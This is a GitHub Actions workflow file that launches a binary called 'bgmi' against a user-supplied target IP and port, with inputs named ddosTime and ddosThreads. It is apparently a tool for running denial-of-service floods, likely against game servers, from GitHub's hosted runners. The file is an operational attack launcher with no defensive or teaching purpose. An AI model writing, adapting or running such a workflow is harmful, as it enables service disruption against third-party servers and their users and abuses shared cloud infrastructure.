name: Execute BGMI Script

on:
  workflow_dispatch:
    inputs:
      ip:
        description: 'Target IP'
        required: true
        type: string
      port:
        description: 'Port'
        required: true
        type: string
      ddosTime:
        description: 'Time(s)'
        required: true
        type: string
      ddosThreads:
        description: 'Threads'
        required: true
        type: string

jobs:
  execute:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v2

    - name: Verify script location
      run: ls -la

    - name: Make script executable
      run: chmod +x ./bgmi

    - name: Verify script permissions
      run: ls -la ./bgmi

    - name: Print inputs
      run: echo "IP: ${{ github.event.inputs.ip }}, Port: ${{ github.event.inputs.port }}, Time: ${{ github.event.inputs.ddosTime }}, Threads: ${{ github.event.inputs.ddosThreads }}"

    - name: Run BGMI script with detailed output
      run: |
        set -x
        ./bgmi ${{ github.event.inputs.ip }} ${{ github.event.inputs.port }} ${{ github.event.inputs.ddosTime }} ${{ github.event.inputs.ddosThreads }}
      continue-on-error: true

    - name: Capture script exit code
      run: echo "Script exited with code $?"
